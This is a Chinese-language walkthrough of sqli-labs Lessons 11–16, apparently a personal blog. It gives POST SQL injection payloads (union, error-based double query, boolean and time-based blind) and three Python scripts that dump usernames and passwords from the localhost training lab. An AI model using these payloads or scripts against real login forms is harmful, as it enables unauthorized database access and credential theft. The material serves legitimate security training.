sqli-labs less11-16

发表于 | 分类于

LESS 11 基于字符串的注入(POST)

在username栏输入单引号’测试,结果:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’’’ and password=’’ LIMIT 0,1’ at line 1

猜测查询语句为:select * from users where username = ‘$username’ and password=’$password’ LIMIT 0,1
于是乎构造payload:

Username : 0’ union select group_concat(username),group_concat(password) from users#
Password :

结果:

Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

LESS 12 基于双引号字符串的注入(POST)

和上一关的不同在于字符串被双引号和括号包围,通过报错讯息可以知道
payload如下:

Username : 0”) union select group_concat(username),group_concat(password) from users#
Password :

LESS 13 双查询注入(POST)

通过报错信息可以知道字符串被一对单引号和一对括号包围,但是成功后不显示信息,只会显示报错信息,于是使用双查询注入:

Username : 0’) union select count(), CONCAT_WS(CHAR(32,58,32),(select count() from users),floor(rand()*2)) as a from users group by a#
Password :

结果:

Duplicate entry ‘13 : 1’ for key ‘group_key’’

可以构造脚本爆表:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from urllib import request
from urllib import parse
import re

url = "http://localhost/sqli-labs-master/Less-13/"

i = 0
while(i < 13):
    data = {"uname":"0') union select count(*), CONCAT_WS(CHAR(32,124,32),(select username from users limit "+str(i)+",1),(select password from users limit "+str(i)+",1),floor(rand()*2)) as a from users group by a#", "passwd":""}
    response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
    info = re.search(r"[^']+\s\|\s[^\s]+?", response)
    if(info == None):
        i -= 1
    else:
        print(info.group())
    i += 1

结果:

Dumb | Dumb | 0
Angelina | I-kill-you | 1
Dummy | p@ssword | 0
secure | crappy | 1
stupid | stupidity | 1
superman | genious | 0
batman | mob!le | 1
admin | admin | 0
admin1 | admin1 | 0
admin2 | admin2 | 1
admin3 | admin3 | 1
dhakkan | dumbo | 1
admin4 | admin4 | 0

LESS 14 双引号双查询注入(POST)

除了把单引号括号改成双引号外和上一关没什么区别,payload:

Username : 0” union select count(), CONCAT_WS(CHAR(32,58,32),(select count() from users),floor(rand()*2)) as a from users group by a#
Password :

其他的和十三关都是一样的

LESS 15 基于布尔的盲注(POST)

POST盲注,第七关的脚本拿过来改一下即可:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
from urllib import request
from urllib import parse
import re

url = "http://localhost/sqli-labs-master/Less-15/"

def getLength(value):
    length = 0
    while True:
        data = {"uname":"' or length("+str(value)+")="+str(length)+"#", "passwd":""}
        response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
        if (re.search("slap", response)):
            length += 1
        else:
            return length

def getName(value):
    dbname = ""
    for n in range(getLength(value)):
        a = 64
        b = 64
        #使用二分法构造动态参数
        while True:
            b = int(b/2)
            data = {"uname":"' or ascii(substr(" + value + "," + str(n+1) + "))<" + str(a) + "#", "passwd":""}
            response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
            if (re.search("slap", response)):
                data["uname"] = "' or ascii(substr(" + value + "," + str(n+1) + "))=" + str(a) + "#"
                response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
                if (re.search("slap", response)):
                    a += b
                else:
                    dbname = dbname + chr(a)
                    break
            else:
                a -= b
    return dbname

print(getName("(select group_concat(username) from users)"))
print(getName("(select group_concat(password) from users)"))

结果和第八关一样

LESS 16 基于时间的盲注(POST)

结合第九关的脚本,再改一下上一关的脚本就成了本关的脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
from urllib import request
from urllib import parse
import time

url = "http://localhost/sqli-labs-master/Less-15/"

def getLength(value):
    length = 0
    while True:
        data = {"uname":"' or if(length("+value+")="+str(length)+",sleep(0.1),1)#", "passwd":""}
        t = time.time()
        request.urlopen(url, parse.urlencode(data).encode()).read().decode()
        if (time.time()-t <= 0.1):
            length += 1
        else:
            return length

def getName(value):
    dbname = ""
    for n in range(getLength(value)):
        a = 64
        b = 64
        #使用二分法构造动态参数
        while True:
            b = int(b/2)
            data = {"uname":"' or if(ascii(substr("+value+","+str(n+1)+"))<"+str(a)+",sleep(0.1),1)#", "passwd":""}
            t = time.time()
            request.urlopen(url, parse.urlencode(data).encode()).read().decode()
            if (time.time()-t <= 0.1):
                data["uname"] = "' or if(ascii(substr("+value+","+str(n+1)+"))="+str(a)+",sleep(0.1),1)#"
                t = time.time()
                request.urlopen(url, parse.urlencode(data).encode()).read().decode()
                if (time.time()-t <= 0.1):
                    a += b
                else:
                    dbname = dbname + chr(a)
                    break
            else:
                a -= b
    return dbname

print(getName("(select group_concat(username) from users)"))
print(getName("(select group_concat(password) from users)"))

速度太慢,不知道有什么好的改进方法